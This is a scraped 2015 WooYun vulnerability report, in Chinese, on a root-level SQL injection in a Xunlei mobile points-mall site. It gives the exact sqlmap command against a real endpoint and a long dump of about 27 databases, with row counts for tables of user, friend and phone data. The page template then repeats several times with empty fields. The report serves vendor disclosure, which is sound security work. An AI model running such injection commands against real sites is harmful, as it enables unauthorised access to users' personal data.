迅雷某站root权限SQL注入漏洞可影响将近30个数据库

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0112383

漏洞标题：迅雷某站root权限SQL注入漏洞可影响将近30个数据库

漏洞作者： BMa

提交时间：2015-05-06 11:24

修复时间：2015-06-20 11:34

公开时间：2015-06-20 11:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-06：细节已通知厂商并且等待厂商处理中
2015-05-06：厂商已经确认，细节仅向厂商公开
2015-05-16：细节向核心白帽子及相关领域专家公开
2015-05-26：细节向普通白帽子公开
2015-06-05：细节向实习白帽子公开
2015-06-20：细节向公众公开

简要描述：

提交还是不提交，这是一个问题
通过还是不通过，交给乌云决定
数据貌似还蛮多的，举个例子，没去看内容

详细说明：

首先站点为：jifenshangcheng.m.xunlei.com

sqlmap.py -u "http://jifenshangcheng.m.xunlei.com/cgi-bin/integra_info?userId=219509333&peerId=F8A45F540116004V&_t=1428930321760&callback=jsonp1"

这里可能还有越权
直接上数据：

available databases [27]:
[*] resgroupstat
[*] commons
[*] export_resource
[*] friend_data
[*] guaguale
[*] hongbao
[*] information_schema
[*] integration
[*] mk_source
[*] mobile_thunder_res_detail
[*] mysql
[*] nx
[*] performance_schema
[*] push
[*] push_android
[*] quan
[*] resgroup
[*] resgroup_temp
[*] resource_reports
[*] sina_caipiao
[*] smarthdd
[*] statistic_data
[*] test
[*] tmp
[*] wx_share
[*] xl_stat
[*] xl_video_dict
back-end DBMS: MySQL 5.0.11
Database: export_resource
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| resource_tmp                                       | 182651  |
| resource_tmp_0506                                  | 74551   |
+----------------------------------------------------+---------+
Database: resgroup
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| group2user                                         | 24367888 |
| user2group                                         | 23767883 |
| user_status                                        | 4220468 |
| cinema_lh                                          | 759717  |
| cinema_tit                                         | 759717  |
| user2group_d                                       | 613863  |
| resources_hot                                      | 150049  |
| resources                                          | 27162   |
| user_history_status                                | 19041   |
| resource_play_cout                                 | 8536    |
| user_ban                                           | 493     |
| cinema_link                                        | 138     |
| group_info                                         | 81      |
| user_info                                          | 74      |
| conf_block                                         | 42      |
| group_info_d                                       | 30      |
| role                                               | 4       |
| settings                                           | 1       |
+----------------------------------------------------+---------+
Database: xl_video_dict
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| list_recom                                         | 844081  |
| list_file                                          | 712502  |
| list_info                                          | 142945  |
| list_site_video_id                                 | 142907  |
| list_report_invalid                                | 92128   |
| list_file_cinema_kankan                            | 6475    |
| list_info_cinema_kankan                            | 1959    |
| list_site                                          | 8       |
| list_cinema_manual                                 | 1       |
+----------------------------------------------------+---------+
Database: mysql
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| help_relation                                      | 1091    |
| help_topic                                         | 534     |
| help_keyword                                       | 486     |
| help_category                                      | 40      |
| `user`                                             | 21      |
| db                                                 | 3       |
| proxies_priv                                       | 2       |
+----------------------------------------------------+---------+
Database: resource_reports
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| resource_report                                    | 5305    |
+----------------------------------------------------+---------+
Database: tmp
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| user_action_unique                                 | 36537440 |
| resources                                          | 59455   |
+----------------------------------------------------+---------+
Database: friend_data
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| user_action_unique                                 | 10938228 |
+----------------------------------------------------+---------+
Database: integration
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| base_integra                                       | 12130032 |
| base_integra_ios                                   | 6652436 |
| job_down_ios                                       | 4989116 |
| job_push_ios                                       | 514999  |
| job_active_click                                   | 437909  |
| job_h5_click                                       | 198114  |
| sign_integra_ios                                   | 70614   |
| job_flow_ios                                       | 69587   |
| sign_integra                                       | 68352   |
| statistic_data                                     | 279     |
| conf_scores                                        | 19      |
| indexpop_flow                                      | 7       |
| job_down                                           | 1       |
+----------------------------------------------------+---------+
Database: nx
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| peer_job_install                                   | 635560  |
| peer_job_active                                    | 510692  |
| list_job_count                                     | 59928   |
| list_job_install                                   | 24608   |
| list_job_active                                    | 17282   |
| conf_job                                           | 175     |
| job_nx                                             | 164     |
| conf                                               | 2       |
+----------------------------------------------------+---------+
Database: resgroup_temp
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| user2group                                         | 23766965 |
| user_id                                            | 6544141 |
| user_status                                        | 4220369 |
| cgi_local_temp                                     | 4188904 |
| cgi_local                                          | 3391275 |
| get_id_nums                                        | 2274954 |
| user_recoder                                       | 1013989 |
| user_recoder_temp                                  | 1009324 |
| newuserid_groupid                                  | 960386  |
| user_history_status                                | 477506  |
| userid                                             | 92863   |
| newuserid_max                                      | 90397   |
| resources                                          | 27162   |
| cgi_push                                           | 1381    |
| cgi_push_temp                                      | 167     |
| group_info                                         | 81      |
| id_group                                           | 12      |
| groupid                                            | 2       |
+----------------------------------------------------+---------+
Database: test
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| target_test                                        | 6036562 |
| t_peerid_info                                      | 5815853 |
| t_peerid_info_new                                  | 4400868 |
| peerid_imei                                        | 2202379 |
| ios_data_new                                       | 2003214 |
+----------------------------------------------------+---------+
Database: sina_caipiao
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| list_user                                          | 165240  |
| list_share_down                                    | 869     |
+----------------------------------------------------+---------+
Database: information_schema
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| PARTITIONS                                         | 3226    |
| COLUMNS                                            | 2699    |
| USER_PRIVILEGES                                    | 534     |
| INNODB_BUFFER_PAGE                                 | 511     |
| SESSION_VARIABLES                                  | 442     |
| INNODB_BUFFER_PAGE_LRU                             | 415     |
| STATISTICS                                         | 409     |
| TABLES                                             | 378     |
| GLOBAL_STATUS                                      | 341     |
| SESSION_STATUS                                     | 341     |
| TABLE_CONSTRAINTS                                  | 253     |
| COLLATION_CHARACTER_SET_APPLICABILITY              | 219     |
| COLLATIONS                                         | 219     |
| INNODB_METRICS                                     | 214     |
| PROCESSLIST                                        | 188     |
| SCHEMA_PRIVILEGES                                  | 50      |
| PLUGINS                                            | 42      |
| CHARACTER_SETS                                     | 40      |
| INNODB_FT_DEFAULT_STOPWORD                         | 36      |
| SCHEMATA                                           | 27      |
| INNODB_SYS_COLUMNS                                 | 26      |
| INNODB_SYS_FIELDS                                  | 11      |
| ENGINES                                            | 9       |
| INNODB_SYS_INDEXES                                 | 9       |
| INNODB_CMP                                         | 5       |
| INNODB_CMP_RESET                                   | 5       |
| INNODB_CMPMEM                                      | 5       |
| INNODB_CMPMEM_RESET                                | 5       |
| INNODB_SYS_TABLES                                  | 5       |
| INNODB_SYS_TABLESTATS                              | 5       |
| INNODB_BUFFER_POOL_STATS                           | 1       |
| INNODB_SYS_DATAFILES                               | 1       |
| INNODB_SYS_TABLESPACES                             | 1       |
+----------------------------------------------------+---------+
Database: mk_source
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| hotrecommend                                       | 321     |
+----------------------------------------------------+---------+
Database: mobile_thunder_res_detail
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| baidureci                                          | 200     |
| popularsitename                                    | 10      |
| defaultsite                                        | 3       |
+----------------------------------------------------+---------+
Database: quan
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| user_phone_friends                                 | 554866187 |
| peer_phone_friends                                 | 482936714 |
| user_friends                                       | 111120527 |
| user_friends_bak                                   | 111063730 |
| peer_friends                                       | 80522290 |
| peer_friends_bak                                   | 80486910 |
| phone2userid                                       | 38364607 |
| peer_status                                        | 7595491 |
| user_status                                        | 5268031 |
| resources_detail_runtime                           | 468159  |
| resources_detail_online                            | 286990  |
| resources_heat                                     | 162192  |
| user_friends_tmp                                   | 110145  |
| resources                                          | 42920   |
| peer_friends_tmp                                   | 42435   |
| resources_detail_cache                             | 35613   |
| peer_friends_today                                 | 25011   |
| user_friends_today                                 | 21996   |
| friend_res                                         | 65      |
| list_xiaomi_game                                   | 12      |
| sys_status                                         | 2       |
+----------------------------------------------------+---------+
Database: wx_share
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| wx_share                                           | 480176  |
+----------------------------------------------------+---------+
Database: hongbao
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| list_share                                         | 213990  |
| stat_share                                         | 211775  |
| list_prize                                         | 7611    |
| list_phone                                         | 7608    |
| conf_cards                                         | 5       |
+----------------------------------------------------+---------+
Database: smarthdd
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| useraddcomment                                     | 4058    |
| inner_comment                                      | 108     |
+----------------------------------------------------+---------+
Database: performance_schema
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| events_waits_summary_by_thread_by_event_name       | 53544   |
| events_statements_summary_by_thread_by_event_name  | 32010   |
| events_stages_summary_by_thread_by_event_name      | 20952   |
| events_waits_summary_by_instance                   | 17515   |
| events_waits_history_long                          | 10000   |
| file_instances                                     | 6923    |
| file_summary_by_instance                           | 6923    |
| mutex_instances                                    | 5000    |
| rwlock_instances                                   | 5000    |
| events_waits_summary_by_account_by_event_name      | 2760    |
| events_waits_summary_by_host_by_event_name         | 2760    |
| events_stages_history                              | 1810    |
| events_statements_history                          | 1783    |
| events_statements_summary_by_account_by_event_name | 1650    |
| events_statements_summary_by_host_by_event_name    | 1650    |
| events_stages_summary_by_account_by_event_name     | 1080    |
| events_stages_summary_by_host_by_event_name        | 1080    |
| events_stages_history_long                         | 1000    |
| events_statements_history_long                     | 1000    |
| setup_instruments                                  | 552     |
| events_statements_summary_by_user_by_event_name    | 495     |
| table_io_waits_summary_by_index_usage              | 454     |
| cond_instances                                     | 401     |
| events_stages_summary_by_user_by_event_name        | 324     |
| events_waits_summary_global_by_event_name          | 276     |
| objects_summary_global_by_type                     | 222     |
| table_io_waits_summary_by_table                    | 222     |
| table_lock_waits_summary_by_table                  | 222     |
| events_statements_summary_by_digest                | 200     |
| threads                                            | 194     |
| events_waits_current                               | 193     |
| socket_instances                                   | 191     |
| socket_summary_by_instance                         | 191     |
| events_statements_current                          | 180     |
| events_statements_summary_global_by_event_name     | 165     |
| events_stages_summary_global_by_event_name         | 108     |
| file_summary_by_event_name                         | 46      |
| setup_consumers                                    | 12      |
| accounts                                           | 10      |
| hosts                                              | 10      |
| performance_timers                                 | 5       |
| session_connect_attrs                              | 5       |
| setup_objects                                      | 4       |
| setup_timers                                       | 4       |
| socket_summary_by_event_name                       | 3       |
| users                                              | 3       |
| events_stages_current                              | 2       |
| setup_actors                                       | 1       |
+----------------------------------------------------+---------+
Database: commons
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| list_words                                         | 103078  |
| dirty_words                                        | 5036    |
| dirty_words_no_platform                            | 874     |
| list_stop_words                                    | 415     |
| baned_words                                        | 281     |
| conf_block                                         | 42      |
+----------------------------------------------------+---------+
Database: xl_stat
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| peerid_cinemas_stat                                | 759717  |
| stat_cinema_sub                                    | 1419    |
+----------------------------------------------------+---------+
Database: statistic_data
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| android_whitelist                                  | 4       |
+----------------------------------------------------+---------+
Database: push
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| to_be_sent_history                                 | 78536315 |
| to_be_sent_old                                     | 1578852 |
| to_be_sent_back                                    | 1148961 |
| sent_result                                        | 13078   |
| sent_result_back                                   | 11      |
| conf_push                                          | 2       |
+----------------------------------------------------+---------+
Database: guaguale
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| list_draw_lottery                                  | 3292688 |
| list_prize_get                                     | 2123800 |
| list_user_get                                      | 1015720 |
| conf_prize                                         | 5       |
+----------------------------------------------------+---------+
Database: push_android
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| target_back_1045                                   | 14477902 |
| target_back_1044                                   | 14365492 |
| target_back_1043                                   | 14253461 |
| target_back_1042                                   | 14143907 |
| target_back_1041                                   | 14035351 |
| target_back_1040                                   | 13931561 |
| target_back_1038                                   | 13801157 |
| target_back_1039                                   | 13667425 |
| target_back_1037                                   | 13548627 |
| target_back_1036                                   | 13432211 |
| target_back_1035                                   | 13190928 |
| target_back_1034                                   | 13069053 |
| target_back_1033                                   | 12906873 |
| target_back_1031                                   | 12715481 |
| target_back_1032                                   | 12715481 |
| target_back_1030                                   | 12583512 |
| target_back_1029                                   | 12447651 |
| target_back_1028                                   | 12300606 |
| target_back_1025                                   | 11684962 |
| target_back_1026                                   | 11640820 |
| target_back_1027                                   | 11605052 |
| target_back_1024                                   | 11548274 |
| target_back_1023                                   | 11360147 |
| target_back_1021                                   | 10980327 |
| target_back_1020                                   | 10872194 |
| target_back_1019                                   | 10763578 |
| target_back_1018                                   | 10661953 |
| target_back_1017                                   | 10559880 |
| target_back_1016                                   | 10354545 |
| target_back_1014                                   | 10137361 |
| target_back_1015                                   | 10027713 |
| target_back_1013                                   | 9923353 |
| target_back_1012                                   | 9598830 |
| target_back_1011                                   | 9246068 |
| target_back_1008                                   | 9133873 |
| target_back_1010                                   | 8782346 |
| target_back_992                                    | 8612997 |
| target_back_989                                    | 8391695 |
| target_back_996                                    | 8276405 |
| target_back_990                                    | 7902115 |
| target_back_983                                    | 7242206 |
| target_back_986                                    | 7189954 |
| target_back_984                                    | 6932015 |
| target_back_975                                    | 6882554 |
| target_back_977                                    | 6856184 |
| target_back_985                                    | 6738943 |
| target_back_976                                    | 6337473 |
| target_back_974                                    | 6235649 |
| target_back_973                                    | 5776476 |
| target_back_945                                    | 5681982 |
| target_back_946                                    | 5681982 |
| target_back_972                                    | 5673985 |
| target_back_944                                    | 5499753 |
| target_back_970                                    | 5366084 |
| target_back_971                                    | 5110709 |
| target_back_943                                    | 4830104 |
| target_back_942                                    | 4730194 |
| target_back_941                                    | 4640332 |
| target_back_937                                    | 4540143 |
| target_back_936                                    | 4437656 |
| target_back_939                                    | 4280824 |
| target_back_940                                    | 4280824 |
| target_back_932                                    | 4198379 |
| target_back_927                                    | 3729036 |
| target_back_928                                    | 3536376 |
| target_back_934                                    | 3110485 |
| target_back_926                                    | 1578837 |
| target_back_933                                    | 1214409 |
| message_group                                      | 12530   |
| message                                            | 482     |
| target_back_1000                                   | 6       |
| target_back_1001                                   | 6       |
| target_back_1002                                   | 6       |
| target_back_1003                                   | 6       |
| target_back_1004                                   | 6       |
| target_back_1005                                   | 6       |
| target_back_1006                                   | 6       |
| target_back_1007                                   | 6       |
| target_back_1009                                   | 6       |
| target_back_1022                                   | 6       |
| target_back_969                                    | 6       |
| target_back_980                                    | 6       |
| target_back_981                                    | 6       |
| target_back_999                                    | 6       |
| target_back_930                                    | 5       |
| target_back_993                                    | 5       |
| target_back_994                                    | 5       |
| target_back_997                                    | 5       |
| target_back_998                                    | 5       |
| target_back_924                                    | 4       |
| target_back_935                                    | 4       |
| target_back_929                                    | 3       |
| target_back_931                                    | 2       |
+----------------------------------------------------+---------+
Database: resgroupstat
+----------------------------------------------------+---------+
| Table                                              | Entries |
+----------------------------------------------------+---------+
| group_res_stat                                     | 25869   |
| group_stat                                         | 54      |
+----------------------------------------------------+---------+

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-05-06 11:34

厂商回复：

感谢反馈！

漏洞评价：

2015-05-06 11:26 | prolog ( 普通白帽子 | Rank:544 漏洞数:107 | 低调求发展)

点赞
2015-05-06 11:34 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

好吧，去掉了一些罗嗦的内容

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0112383

漏洞标题：迅雷某站root权限SQL注入漏洞可影响将近30个数据库

相关厂商：迅雷

漏洞作者： BMa

提交时间：2015-05-06 11:24

修复时间：2015-06-20 11:34

公开时间：2015-06-20 11:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0112383

漏洞标题：迅雷某站root权限SQL注入漏洞可影响将近30个数据库

相关厂商：迅雷

漏洞作者： BMa

提交时间：2015-05-06 11:24

修复时间：2015-06-20 11:34

公开时间：2015-06-20 11:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0112383"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：